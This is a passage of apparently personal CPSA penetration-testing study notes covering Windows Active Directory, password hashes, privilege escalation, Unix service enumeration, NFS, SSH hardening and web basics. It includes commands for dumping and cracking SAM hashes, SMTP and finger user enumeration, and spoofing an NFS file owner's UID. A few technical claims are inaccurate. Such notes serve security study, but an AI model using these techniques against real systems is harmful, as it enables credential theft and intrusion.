RID Master: The Relative ID Master assigns blocks of Security Identifiers (SID) to different DCs they can use for newly created objects. Each object in AD has an SID, and the last few digits of the SID are the Relative portion. In order to keep multiple objects from having the same SID, the RID Master grants each DC the privilege of assigning certain SIDs.

PDC Emulator: The DC with the Primary Domain Controller Emulator role is the authoritative DC in the domain. The PDC Emulator responds to authentication requests, changes passwords, and manages Group Policy Objects. And the PDC Emulator tells everyone else what time it is! It’s good to be the PDC.

Infrastructure Master: The Infrastructure Master role translates Globally Unique Identifiers (GUID), SIDs, and Distinguished Names (DN) between domains. If you have multiple domains in your forest, the Infrastructure Master is the Babelfish that lives between them. If the Infrastructure Master doesn’t do its job correctly you will see SIDs in place of resolved names in your Access Control Lists (ACL).

Source: Jeff Petters, varonis.com, referenced on 03-Sep-2021
https://www.varonis.com/blog/fsmo-roles/

FSMO still used as of Windows Server 2012 R2.

https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/fsmo-roles

Reliance of AD on DNS and LDAP

https://social.technet.microsoft.com/Forums/en-US/ac527731-0f0c-494d-bc49-bbb87e7151fe/active-directory-where-and-when-dns-and-ldap-is-used?forum=winservergen

DNS is used for local applications of servers.
e.g. a host name called "secrets.local" can be translated into an IP address by the DNS server.

DNS is an integral part of the Active Directory.

LDAP acts like a database with read and write capabilities, which allows for communication within the AD. It also governs the authentication and authorization capabilities by storing user credentials etc.

Group Policy (Local Security Policy)

Group Policy stores the way the OS will operate, such as password expiry dates, administrative rights. They also manage the users access to files, folders, media, programmes etc.
https://www.cbtnuggets.com/blog/certifications/microsoft/7-most-useful-ad-group-policy-settings

https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

E4: Windows Passwords

Password policies (complexity, lockout policies)

Account Brute Forcing

Hash Storage (merits of LANMAN, NTLMv1 / v2)

Offline Password Analysis (rainbow tables / hash brute forcing)

Password Policies

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/password-policy

Policy Description
Enforce password history history Describes the best practices, location, values, policy management, and security considerations for the Enforce password history security policy setting.
Maximum password age Describes the best practices, location, values, policy management, and security considerations for the Maximum password age security policy setting.
Minimum password age Describes the best practices, location, values, policy management, and security considerations for the Minimum password age security policy setting.
Minimum password length Describes the best practices, location, values, policy management, and security considerations for the Minimum password length security policy setting.
Password must meet complexity requirements Describes the best practices, location, values, and security considerations for the Password must meet complexity requirements security policy setting.
Store passwords using reversible encryption Describes the best practices, location, values, and security considerations for the Store passwords using reversible encryption security policy setting.

Account Bruteforcing

We can brute force from RDP, SSH, LDAP, SMB or other exposed services.
We can try reusing credentials that we have found in apps, databases, etc.

Hash Storage (merits of LANMAN, NTLMv1 / v2)

Credentials are often saved as hashed data.

LANMAN

https://en.wikipedia.org/wiki/LAN_Manager

LAN Manager is an obsolete authentication protocol, with its final release in 1994.

Password Weakness:
14 characters only, all upper case.

New Technology LAN Manager(NTLM)

https://en.wikipedia.org/wiki/NT_LAN_Manager

NTLM is not recommended to be used by Microsoft since 2010, but it is still widely used and deployed, especially in AD environments.

Famous attack is pass-the-hash attack, where once we have gotten the NTLM hash, we can use it to get into authenticated places. Used in SMB, and lateral movements.

https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4

Sample NTLM hash

u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c

admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030

Source: Peter Gombos, 20 Feb 2018, "LM, NTLM, Net-NTLMv2, oh my!"

Different fields in the LM hash format

First field: the username

Second field: the SID (Security IDentifier) for that username

Third field: the LM hash

Forth field: the NTLM hash

https://vk9-sec.com/windows-password-hashes/

Offline Password Analysis (rainbow tables / hash brute forcing)

Hydra, John the Ripper with wordlists, Rainbowcrack

https://project-rainbowcrack.com/

https://github.com/vanhauser-thc/thc-hydra

https://tools.kali.org/password-attacks/hydra

E5: Windows Vulnerabilities

Requirements:

Knowledge of remote windows vulnerabilities, particularly those for which robust exploit code exists in the public domain.

Knowledge of local windows privilege escalation vulnerabilities and techniques.

Knowledge of common post exploitation activities:

- obtain password hashes, both from the local SAM and cached credentials
- obtaining locally-stored clear-text passwords
- crack password hashes
- check patch levels
- derive list of missing security patches
- reversion to previous state

Knowledge of remote windows vulnerabilities, particularly those for which robust exploit code exists in the public domain.

Name Desc cve/ms
EternalBlue SMB vulerability ms17-010

Knowledge of local windows privilege escalation vulnerabilities and techniques.

Name Desc cve/ms/remarks
Pass the hash reuse of NTLM hash Mimikatz
Silver/Golden Ticket reuse of NTLM hash Mimikatz. Lateral movement.
Cached passwords - -
Session Highjacking - -
Token Manipulation - -
Unquoted service paths - Unquoted service paths are not escaped, and windows will look for the file name without spaces, before it looks for file names with spaces. If a service is called Image Viewer, we might be able to execute a payload named "Image". Windows will try to run Image first, before considering other file names with spaces.
DLL highjacking - If we have write permissions to a binary dependency folder used by services, we can overite the DLL to a reverse shell payload, or other payloads.
Registry modifications - E.g. if in registry a service executes a binary, and we can change the binary location from registry value, we can achieve code execution if it is on elevated privileges.
Autorun - -
Bad write permissions - -

Knowledge of common post exploitation activities:

• obtain password hashes, both from the local SAM and cached credentials

• obtaining locally-stored clear-text passwords

• crack password hashes

• check patch levels

• derive list of missing security patches

• reversion to previous state

SAM credential dump

SAM = Security Accounts Manager (SAM)
On windows victim machine

reg save hklm\system system
reg save hklm\sam sam

On Attacker Kali

samdump2 system sam

Hash Cracking

We can use hashcat.
Hash.txt will have the hashes saved into it.

john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt

Check patch levels

wmic qfe get Caption,Description,HotFixID,InstalledOn

derive list of missing security patches

We can use some vulnerability scanners like Nessus, WindowsExploitSuggester.
https://msrc.microsoft.com/update-guide

Workflow: Check the patches from wmic, see when the latest patch is, refer to windows update patches to check the date.
The date is useful to help narrow down which exploits we can use. Any exploit created after the patch date is more likely to work.

Reversion to previous state

https://www.lifewire.com/how-to-start-system-restore-from-the-command-prompt-2624522

If system restore data is available, we can try it.

rstrui.exe

This attack vector is rarely seen, but good to know.

E6: Windows Patch Management Strategies

Knowledge of common windows patch management strategies:

- SMS
- SUS
- WSUS
- MBSA

Microsoft Systems Management Server (SMS)

https://en.wikipedia.org/wiki/Microsoft_System_Center_Configuration_Manager

Microsoft Endpoint Configuration Manager (Configuration Manager, also known as ConfigMgr or MECM), formerly System Center Configuration Manager (SCCM) and Systems Management Server (SMS) is a systems management software product developed by Microsoft for managing large groups of computers running Windows NT, Windows Embedded, macOS (OS X), Linux or UNIX, as well as Windows Phone, Symbian, iOS and Android mobile operating systems. Configuration Manager provides remote control, patch management, software distribution, operating system deployment, network access protection and hardware and software inventory.

  • Systems Management Server 1.0, released in 1994, last release in 2003.
  • System Center Configuration Manager 2007, last release 2019
  • Endpoint Configuration Manager released 2019, last released August 2021

Author's Notes: CREST's CPSA Technical syllabus document does not specify

Key functionalities of Microsoft Systems Management Server 2003 include the following:

Enterprise application deployment. From mobile devices to datacenter servers, Systems Management Server 2003 delivers comprehensive client and server application deployment using Active Directory(r) and inventory-based targeting. With its new Web services-based agent, Systems Management Server 2003 extends unified management beyond the corporate network to the growing mobile work force.

Securing the enterprise. The inclusion of vulnerability assessment reporting and integrated patch deployment features enables customers to constantly monitor security patch status across their corporations and provide rapid, accurate delivery of updates.

Managing computer assets. With integrated inventory and application-use monitoring, Systems Management Server 2003 helps companies keep track of corporate IT assets, improve help desk efficiency and identify application usage in the enterprise.

Source: https://news.microsoft.com/2003/10/22/microsoft-systems-management-server-2003-is-released-to-manufacturing/

Microsoft Software Update Services (SUS)

What is Microsoft Software Update Services (SUS)?

Microsoft SUS is a free patch management tool provided by Microsoft to help network administrators deploy security patches more easily. In simple terms, Microsoft SUS is a version of Windows Update that you can run on your network.

Instead of each workstation having to connect to the Internet to update Windows, each workstation connects to the Microsoft SUS Server instead and updates from there. Microsoft SUS Server alone requires access to the public Internet as it connects to Windows Update.

The server features include:

Built-in security. The administrative pages are restricted to local administrators on the computer that hosts the updates. The synchronization validates the digital certificates on any downloads to the update server. If the certificates are not from Microsoft, the packages are deleted.

Selective content approval. Updates synchronized to your server running Software Update Services are not made automatically available to the computers that have been configured to get updates from that server. The administrator approves the updates before they are made available for download. This allows the administrator to test the packages being deploying them.

Content synchronization. The server is synchronized with the public Windows Update service either manually or automatically. The administrator can set a schedule or have the synchronization component of the server do it automatically at preset times. Alternatively, the administrator can use the Synchronize Now button to manually synchronize.

Server-to-server synchronization. Because you may need multiple servers running Microsoft SUS inside your corporation in order to bring the updates closer to your desktops and servers for downloading, Microsoft SUS will allow you to point to another server running Microsoft SUS instead of Windows Update, allowing these critical software updates to be distributed around your enterprise.

Update package hosting flexibility. Administrators have the flexibility of downloading the actual updates to their intranet, or pointing computers to a worldwide network of download servers maintained by Microsoft. Downloading updates might appeal to an administrator with a network closed to the Internet. Large networks spread over geographically disparate sites might find it more beneficial to use the Microsoft maintained download servers. These are the actual Windows Update download servers. In a scenario like this, an administrator would download and test updates at a central site, then point computers requiring updates to one of the Windows Update download servers. Microsoft maintains a worldwide network of these type servers.

Multi-language support. Although the Software Update Services administrative interface is available only in English or Japanese, the server supports the publishing of updates to multiple operating-system language versions. Administrators can configure the list of languages for which they want updates downloaded.

Remote administration via HTTP or HTTPS. The administrative interface is Web-based and therefore allows for remote (internal) administration using Internet Explorer 5.5 or higher.

Update status logging. You can specify the address of a Web server where the Automatic Updates client should send statistics about updates that have been downloaded, and whether the updates have been installed. These statistics are sent using the HTTP protocol and appear in the log file of the Web server.

Source: Daniel Petri, Jan 08, 2009, What is Microsoft Software Update Services (SUS)?, https://www.petri.com/sus?cf_chl_jschl_tk=pmd_lZA2Avy90Pl2Pp5K6ShsNJa7iEY6QIV7UW8nxHQI3vU-1631456056-0-gqNtZGzNAdCjcnBszQaR

SUS only delivered hotfixes and patches for Microsoft operating systems. SUS ran on a Windows Server operating system and downloaded updates for the specified versions of Windows from the remote Windows Update site which is operated by Microsoft. Clients could then download updates from this internal server, rather than connecting directly to Windows Update. Support for SUS by Microsoft was originally planned to end on 6 December 2006, but based on user feedback, the date was extended to 10 July 2007.

Source: https://en.wikipedia.org/wiki/Windows_Server_Update_Services

SUS does not update service packs, applications, etc.

Windows Server Update Services (WSUS)

Windows Server Update Services (WSUS), previously known as Software Update Services (SUS), is a computer program and network service developed by Microsoft Corporation that enables administrators to manage the distribution of updates and hotfixes released for Microsoft products to computers in a corporate environment. WSUS downloads these updates from the Microsoft Update website and then distributes them to computers on a network. WSUS is an integral component of Windows Server.

Source: https://en.wikipedia.org/wiki/Windows_Server_Update_Services

WSUS Operations

Windows Server Update Services 2.0 and above operate on a repository of update packages from Microsoft. It allows administrators to approve or decline updates before release, to force updates to install by a given date, and to produce extensive reports on which updates each machine requires. System administrators can also configure WSUS to approve certain classes of updates automatically (critical updates, security updates, service packs, drivers, etc.). One can also approve updates for detection only, allowing an administrator to see which machines will require a given update without also installing that update.

WSUS may be used to update computers on a disconnected network. This requires exporting patch data from a WSUS server connected to the internet and, using removable media, importing to a WSUS server set up on the disconnected network.

Administrators can use WSUS with Group Policy for client-side configuration of the Automatic Updates client, ensuring that end-users can't disable or circumvent corporate update policies. WSUS does not require the use of Active Directory; client configuration can also be applied by Local Group Policy or by modifying the Windows registry.

WSUS uses .NET Framework, Microsoft Management Console and Internet Information Services. WSUS 3.0 uses either SQL Server Express or Windows Internal Database as its database engine, whereas WSUS 2.0 uses WMSDE. System Center Configuration Manager (SCCM) interoperates with WSUS and can import third party security updates into the product.

Source: https://en.wikipedia.org/wiki/Windows_Server_Update_Services

Latest release in 2019, for Windows Server 2019.

Microsoft Baseline Security Analyzer (MBSA)

Microsoft Baseline Security Analyzer (MBSA) is a discontinued software tool which is no longer available from Microsoft that determines security state by assessing missing security updates and less-secure security settings within Microsoft Windows, Windows components such as Internet Explorer, IIS web server, and products Microsoft SQL Server, and Microsoft Office macro settings. Security updates are determined by the current version of MBSA using the Windows Update Agent present on Windows computers since Windows 2000 Service Pack 3. The less-secure settings, often called Vulnerability Assessment (VA) checks, are assessed based on a hard-coded set of registry and file checks. An example of a VA might be that permissions for one of the directories in the /www/root folder of IIS could be set at too low a level, allowing unwanted modification of files from outsiders.

In November 2013 MBSA 2.3 was released. This release adds support for Windows 8, Windows 8.1, Windows Server 2012, and Windows Server 2012 R2.

MBSA only scans for 3 classes of updates, security updates, service packs and update rollups. Critical and optional updates are left aside.

Source: https://en.wikipedia.org/wiki/Microsoft_Baseline_Security_Analyzer

E7: Desktop Lockdown breakout

Knowledge and understanding of techniques to break out of a locked down Windows desktop / Citrix environment.
Privilege escalation techniques.

See E5.

E8: Exchange

Knowledge of common attack vectors for Microsoft Exchange Server.
https://en.wikipedia.org/wiki/Microsoft_Exchange_Server

MS Exchange server is a mail exchange server.

Weak to wordlist credential attacks (credential stuffing).

Attacks may come from other services in the ASP.NET web framework.

E9: Common Windows Applications

Knowledge of significant vulnerabilities in common windows applications for which there is public exploit code available.

Some common in Windows Applications vulnerabilities:
- EternalBlue for SMB
- NetBIOS information leakage.
- SMB leakage.
- RDP attacks.

Anything with anonymous login.

F: Unix Security Assessment

Introduction

UNIX is an arm of OS with a long history.
https://en.wikipedia.org/wiki/Unix#Free_Unix_and_Unix-like_variants

A quick look at modern UNIX OS
- Oracle Solaris Operating System.
- Darwin Operating System.
- IBM AIX Operating System.
- HP-UX Operating System.
- FreeBSD Operating System.
- NetBSD Operating System.
- Microsoft's SCO XENIX Operating System.
- SGI IRIX Operating System.

Oracle Solaris

F1: User Enumeration

Requirements:

Discovery of valid usernames from network services commonly running by default:
- rusers
- rwho
- SMTP
- finger
Understand how finger daemon derives the information that it returns, and hence how it can be abused.

rusers

Check who is logged in on remote machines
https://www.unix.com/man-page/linux/1/rusers/

rusersd needs to be installed on the remote machine. It is like a listener/server.

rusers -al <target_ip>

It may show usernames and ip addresses.

rwho

Check who is logged in to our current local machine.
who feels more reliable. SSH connection will be "pts". "TTY" connections are local physical users.

Simple Mail Transfer Protocol(SMTP)

Hosts need SMTPd running.

nc -vn <target_ip> 25

Finding Information

HELO             # or HELO x
VRFY root        # will check if this user in system or not.
EXPN root        # will check user and may reveal email address

Auto enumeration
nmap --script smtp-enum-users <ttarget_ip>

Finger

Service which returns user details like full name, emails, etc.
Host needs the fingerd running.
https://en.wikipedia.org/wiki/Finger_protocol

The program would supply information such as whether a user is currently logged-on, e-mail address, full name etc. As well as standard user information, finger displays the contents of the .project and .plan files in the user's home directory.

nc -vn <target_id> 79

Listing users

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Finger bounce

finger user@host@victim
finger @internal@external

Source: https://book.hacktricks.xyz/pentesting/pentesting-finger

F2: Unix Vulnerabilities

Recent or commonly-found Solaris vulnerabilities, and in particular those for which there is exploit code in the public domain.

Recent or commonly-found Linux vulnerabilities, and in particular those for which there is exploit code in the public domain.

Use of remote exploit code and local exploit code to gain root access to target host

Common post-exploitation activities:

- exfiltrate password hashes
- crack password hashes
- check patch levels
- derive list of missing security patches
- reversion to previous state

Solaris Vulnerabilities

Author's Notes: Couldn't find any that is generic enough to put in here... :(

Linux Vulnerabilities

  • Dirty Cow kernel exploit

Generally, if the kernel version is 3+, it is definitely vulnerable to some kernel exploits

Exfiltrate password hashes & crack

Linux password files.

/etc/passwd
/etc/shadow

Once we have these 2, it may be possible to do wordlist attacks, or bruteforce.

Check patch levels

uname -a

Derive list of missing security patches

Author's Notes: Each flavour or distribution have their own package managers. Each handle updating differently.

For example, Debian or Ubuntu with APT package manager:

APT command description
apt list --upgradable List all updates available
apt list --upgradable | grep "-security" List all updates that are security.

Taken from: learnsomemore, https://askubuntu.com/questions/774805/how-to-get-a-list-of-all-pending-security-updates

reversion to previous state

Solaris reverting snapshots
https://docs.oracle.com/cd/E36784_01/html/E36820/revertsnap.html
- svcadm restart manifest-import
- svcadm refresh
- svccfg refresh

Linux does not have a default "System Restore" function. There are packages that can help with this.

F3: File Transfer Protocol(FTP)

FTP access control
Anonymous access to FTP servers
Risks of allowing write access to anonymous users.

FTP Bounce Attack

FTP bounce attack is an exploit of the FTP protocol whereby an attacker is able to use the PORT command to request access to ports indirectly through the use of the victim machine, which serves as a proxy for the request, similar to an Open mail relay using SMTP.

This technique can be used to port scan hosts discreetly, and to potentially bypass a network Access-control list to access specific ports that the attacker cannot access through a direct connection, for example with the nmap port scanner.

Nearly all modern FTP server programs are configured by default to refuse PORT commands that would connect to any host but the originating host, thwarting FTP bounce attacks.

Source: https://en.wikipedia.org/wiki/FTP_bounce_attack

FTP Access Control

Uses username and password.
Possible to set ftp-specific user, and deny other users from logging in. We can also set home folders for FTP, so that they cannot look at our whole system files.

https://linuxroutes.com/create-ftp-user-with-specific-directory-access/

Importantly, we need to disable shell access for the FTP user.

usermod -s /sbin/nologin ftpuser

Even if the ftpuser password is leaked, attackers cannot SSH in through the ftpuser.

Anonymous access to FTP servers

Login:

ftp <target_ip>
pftp <target_ip>   # this is in passive mode

Credentials:

Username: anonymous

Password: anonymous

Risks of allowing write access to anonymous users.

If the directory is linked to a php website, we can upload a php file and achieve code execution.

It depends on what the intention of the FTP server, and on you to figure out an attack vector based on file upload from FTP service.

FTP commands:

get filename.txt

put filename.txt

If we fail to put a file, that means we do not have write access. It may be worth it to check if we can write to other directories.

F4: Sendmail/ SMTP

Valid username discovery via EXPN and VRFY
Awareness of recent Sendmail vulnerabilities; ability to exploit them if possible
Mail relaying

Hosts need SMTPd running.

nc -vn <target_ip> 25

Finding Information

HELO             # or HELO x
VRFY root        # will check if this user in system or not.
EXPN root        # will check user and may reveal email address

Auto enumeration

nmap --script smtp-enum-users <target_ip>

Recent vulnerabilities

Mail Relaying

Often used in the cloud to help businesses send mass emails, overcoming SMTP limits set by providers etc.
https://blog.mailchannels.com/what-is-an-smtp-relay-service

F5: Network File System(NFS)

NFS security: host level (exports restricted to particular hosts) and file level (by UID and GID).

Root squashing, nosuid and noexec options.

File access through UID and GID manipulation.

NFS is used for file sharing in a network. Generally, we can mount a folder onto our local machine, and have shared functions

Enumerating shares

showmount -e <target_ip>

Mounting onto our local machine

https://linuxize.com/post/how-to-mount-an-nfs-share-in-linux/ 

sudo mount -t nfs target_ip:/home/myuser/backups /var/backups -nolock

unmounting the share

umount 10.10.0.10:/home/myuser/backups
OR
umount /var/backups

Here, we are mounting the remote user's backup folder into our local machine's /var/backups folder.

Automatic mounting can be done with /etc/fstab

NFS security by GID, UID

GID and UID are group id and user id.
id
id command will show current users id.

On the NFS server machine, some files may be restricted to certain UID or GIDs.

Launching attack

CASE: A file has the following read permissions:
UID=1103

When we mount it, we need similar permissions to access it.
We can add a new user into our attacker machine with the UID of 1103

Add a user.

sudo useradd -u 1103 tempuser

Change the user's password

sudo passwd tempuser

Change user of the terminal to tempuser

su tempuser

Try and access the file.

If a file needs root, we can change to our own root user to access it.
The same process goes for GID.

Root Squashing

Root squash is a special mapping of the remote superuser (root) identity when using identity authentication (local user is the same as remote user). Under root squash, a client's uid 0 (root) is mapped to 65534 (nobody). It is primarily a feature of NFS but may be available on other systems as well.

Root squash is a technique to avoid privilege escalation on the client machine via suid executables Setuid. Without root squash, an attacker can generate suid binaries on the server that are executed as root on other client, even if the client user does not have superuser privileges. Hence it protects client machines against other malicious clients. It does not protect clients against a malicious server (where root can generate suid binaries), nor does it protect the files of any user other than root (as malicious clients can impersonate any user).

Source: https://en.wikipedia.org/wiki/Unix_security#Root_squash

F6: Berkeley R* Service (Berkeley r-commands)

https://en.wikipedia.org/wiki/Berkeley_r-commands

Berkeley r* service:
- access control (/etc/hosts.equiv and .rhosts)
- trust relationships
Impact of poorly-configured trust relationships.

Berkeley r-commands is a suite created 1981 for sending remote commands from one Unix computer to another.
It is not in use today, however, we may still see some or its services, such as rlogin, running in CTFs or labs.

Commands
- rlogin - remote login
- rsh - remote shell. This is a server, does not require login.
- rexec - remote execute. This is a server, requires login.
- rcp - remote copy
- rwho - remote who
- rstat - rstat returns performance statistics from the kernel.
- ruptime - shows how long it has been since last restart. If not response, computer marked as down.

Those r-commands which involve user authentication (rcp, rexec, rlogin, and rsh) share several serious security vulnerabilities:

  • All information, including passwords, is transmitted unencrypted (making it vulnerable to interception).
  • The .rlogin (or .rhosts) file is easy to misuse. They are designed to allow logins without a password, but their reliance on remote usernames, hostnames, and IP addresses is exploitable. For this reason many corporate system administrators prohibit .rhosts files, and actively scrutinize their networks for offenders.
  • The protocol partly relies on the remote party's rlogin client to provide information honestly, including source port and source host name. A corrupt client is thus able to forge this and gain access, as the rlogin protocol has no means of authenticating other machines' identities, or ensuring that the requesting client on a trusted machine is the real rlogin client.
  • The common practice of mounting users' home directories via NFS exposes rlogin to attack by means of fake .rhosts files - this means that any of NFS's security faults automatically plague rlogin.

Due to these problems, the r-commands fell into relative disuse (with many Unix and Linux distributions no longer including them by default). Many networks that formerly relied on rlogin and telnet have replaced them with SSH and its rlogin-equivalent slogin.
Source: https://en.wikipedia.org/wiki/Berkeley_r-commands#Security

F7: X11 - X Windowing systom common in Unix-like OSes

X Windows security and configuration; host-based vs. user-based access control. (NOT MICROSOFT WINDOWS)
https://www.x.org/wiki/
https://en.wikipedia.org/wiki/X_Window_authorization
Manual page: https://www.x.org/archive/current/doc/man/man1/Xserver.1.xhtml

It is a GUI system.

User-based access control.

$ xhost +SI:localuser:anotheruser
localuser:anotheruser being added to access control list

Check for successful addition with

xhost

For remote users, we may need something like SUN-DES-1 and MIT-KERBEROS-5 identitiy management systems.

Host-based

https://www.ibm.com/docs/en/aix/7.1?topic=concerns-enabling-disabling-access-control

xhost + hostname

Hostname is taken from /etc/hosts

Fatal error

xhost +

Without a host name, this will allow all hosts. If the server is open to internet, then it is of course extremely vulnerable.

F8: Remote Procedure Call(RPC) Services

https://en.wikipedia.org/wiki/Remote_procedure_call
RPC service enumeration
Common RPC services
Recent or commonly-found RPC service vulnerabilities.

Allows for client to execute procedures on a remote machine.
NFS is a prominent user of RPC.

RPC service enumeration

RPC Tools: https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools

nmap -sV --script=nfs-* <target_ip>
rpbind -p <target_ip>
rpcinfo -p <target_ip>
rpcclient --I <target_ip>
rpcdump [-p port] <target_ip>

Common RPC services

  • NFS
  • SMB2
  • MSRPC

F9: Secure Shell(SSH)

Identify the types and versions of SSH software in use
Securing SSH
Versions 1 and 2 of the SSH protocol
Authentication mechanisms within SSH

https://github.com/jtesta/ssh-audit
nc -vn <target_IP> 22
ssh-audit.py [-1246pbcnjvlt] <host>

Securing SSH

https://linux.die.net/man/5/sshd_config

Turn off root login

vi /etc/ssh/sshd_config
Change PermitRootLogin to no
PermitRootLogin no
restart SSH server
/etc/init.d/sshd restart

Disable empty passwords

vi /etc/ssh/sshd_config
Change PermitEmptyPasswords to no
PermitEmptyPasswords no

Turn off password login

vi /etc/ssh/sshd_config
Change PasswordAuthentication to no
PasswordAuthentication no

This will mean that we have to login using a private key file.
If the key is leaked, change it immediately.

Set number of login tries to prevent login

vi /etc/ssh/sshd_config
MaxAuthTries 3

MaxAuthTries
Specifies the maximum number of authentication attempts permitted per connection. Once the number of failures reaches half this value, additional failures are logged. The default is 6.

Protection tools

https://www.sshguard.net/
https://www.fail2ban.org/wiki/index.php/Main_Page

These are log monitoring and response tools.

Changing port number?

While we can change SSH port to somgthing like port 9999(where the default is port 22), it is still weak to targetted attacks.

Tools like shodan can scan for port 22 services on the internet.

However, security via obscurity is not reliable and largely discouraged.

Appendix G: Web Technologies

G1: Web Server Operations

How a web server functions in terms of the client/server architecture.
Concepts of virtual hosting and web proxies.

Traditional Web application

  1. Web server
  2. Database server

Client send HTTP requests to webserver, server returns a full webpage after pulling and processing data from static files or database.

Install your own server:
https://www.apachefriends.org/index.html

Famous Stacks:
Linux, Apache, MySQL, PHP, Perl (LAMPP)

Modern Apps and Single Page Applications

Spits backend and front end.

Frontend talks to backend via asynchronous javascript HTTP requests.
https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/Synchronous_and_Asynchronous_Requests

A simple view of this is as such. When we get a new PHP page, the browser will request for a totally new page, and data has to be passed to the new page.

Single Page Applications will switch the whole page within the browser to some other content, without having to load new page from browser. The new content could be pre-loaded, or taken via javascript from a backend server to serve the content.

The above is a simplistic rundown of webtechnologies.
Further reading is required.
https://archive.uneca.org/sites/default/files/uploaded-documents/SROs/SA/GIS-SP2018/introduction_to_web_technology.pdf
https://developer.mozilla.org/en-US/docs/Learn/Common_questions/What_is_a_web_server

Virtual Hosting

Tradditionally, websites are hosted on computers within an office environment, where the office owns the physical hardware connected to the internet, and is responsible of hardware maintenance and such.

Virtual Hosting is where We can "split" the computer in a way where we can host multiple websites or subdomains.
https://en.wikipedia.org/wiki/Virtual_hosting

We will likely see this in cheap shared hosting services such as GoDaddy.

Web Proxies

https://en.wikipedia.org/wiki/Proxy_server

Client -> Proxy Server -> web server

The Proxy server sits inbetween the client and the webserver. It can serve functions such as monitoring and filtering, firewall, loadbalancing functions etc.

In pentesting, we may use proxy servers to simulate some behaviours of the machines to accurately retrieve data.

G2: Web Servers and their flaws

Common web servers and their fundamental differences and vulnerabilities associated with them:
• IIS
• Apache (and variants)

Internet Information Services (IIS)

Windows web service.
Runs with .asp, .aspx extensions
Depends on web.config file

If we have unrestricted file upload capabilities, we can upload .asp, .aspx files to run reverse shells or other payloads.

If Web.config is viewable, there may be some credentials that is there for us to exploit. If we can change the web.config, we may also use it to achieve code execution.

Apache

On its own, Vulnerabilities in the servers are usually due to misconfigurations.
e.g. HTTP PUT/COPY methods.

APACHE is often packaged together with PHP. Most vulnerabilities will be found as application vulnerabilities rather than Apache vulnerabilities.

Apache TOMCAT (.jsp)

Host manager page vulnverabile to WAR file upload.
uses .jsp file extension.

Vulnerabilities in the servers are usually due to misconfigurations.
e.g. HTTP PUT/COPY methods.

G3: Web Enterprise Architecture

Design of tiered architectures.
The concepts of logical and physical separation.
Differences between presentation, application and database layers.

https://www.ibm.com/sg-en/cloud/learn/three-tier-architecture

Each tier is run on separate infrastructure. Instead of a LAMPP stack on one computer only, we can split frontend, backend, and database into 3 servers.

Presentation Tier (aka frontend)

HTML/CSS and JS for communicating with other services.

Application Tier

Commonly using REST, RESTFUL or SOAP APIs, this is the back end where data processing occurs.

Database Tier

For storing and retrieving data.

The concepts of logical and physical separation.

A simplistic view is that "logical" means by software. For example, the LAMPP stack has all 3 services running on the same machine.

A simplistic view is that "physical" means by hardware. For example, we have 3 servers running front,back and database layers.

Implications:
Load balancing - The infrastructure is more reliable. if the frontend gets a large number of queries and slows down or crashes, the all 3 services are down.

On a multi-tier architecture, if front end is heavy and slow, we may be able to spin up another instance of front end to lesson the load, whilst not touching the backend or databases.

Another implication is that if the frontend is hacked, the data is "safe", as it is elsewhere, granted that credentials are not leaked. This may give incident responders time to react and take action.

G4: Web Protocols

Web protocols: HTTP, HTTPS, SOAP.
All HTTP web methods and response codes.
HTTP Header Fields relating to security features

Hypertext Transfer Protocol (HTTP)

https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol

Request-Response model.
Browser sends requests -> Server responds with data -> Browser shows data on screen for users

HTTP Requests

HTTP Request Header

Methods are a way for HTTP to send and receive data, and may have specific functions.
Servers may filter request using any of the information here.

Sample request header:

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.google.com
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: PHPSession=d2hhdGV2ZXJtYW50aGlzaXNhbWF6aW5nanVzdGFzYW1wbGVjb29raWU=; username:iamhero
Connection: Keep-Alive

Method - GET. / is the path of home page.
User-Agent: this is what the browser is using. Can be spoofed. Servers may filter request using this.
Host is the web domain url
Cookie is where data is stored for any number of applications like shopping cart, analytics etc.

Reading:
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers

HTTP Request BODY

Add a space after the header to indicate BODY data. This can be where form data is, or any other data that you want to send over to the server.

HTTP METHODS

https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods
Extract from Mozzila, Methods

HTTP defines a set of request methods to indicate the desired action to be performed for a given resource. Although they can also be nouns, these request methods are sometimes referred to as HTTP verbs. Each of them implements a different semantic, but some common features are shared by a group of them: e.g. a request method can be safe, idempotent, or cacheable.

GET
The GET method requests a representation of the specified resource. Requests using GET should only retrieve data.

HEAD
The HEAD method asks for a response identical to that of a GET request, but without the response body.

POST
The POST method is used to submit an entity to the specified resource, often causing a change in state or side effects on the server.

PUT
The PUT method replaces all current representations of the target resource with the request payload.

DELETE
The DELETE method deletes the specified resource.

CONNECT
The CONNECT method establishes a tunnel to the server identified by the target resource.

OPTIONS
The OPTIONS method is used to describe the communication options for the target resource.

TRACE
The TRACE method performs a message loop-back test along the path to the target resource.

PATCH
The PATCH method is used to apply partial modifications to a resource.

Usage:
GET - Static webpages. Just sends HTML data or API data over. Data transmitted over URL parameters
POST - Usually used with forms. Data is send in Request BODY.

There are other methods like COPY.

Dangerous Methods:
PUT/COPY - If we can put files, we achieve file upload. And if it is unrestricted file upload, it can be an entrypoint into the server.

Hypertext Transfer Protocol Secure (HTTPS)

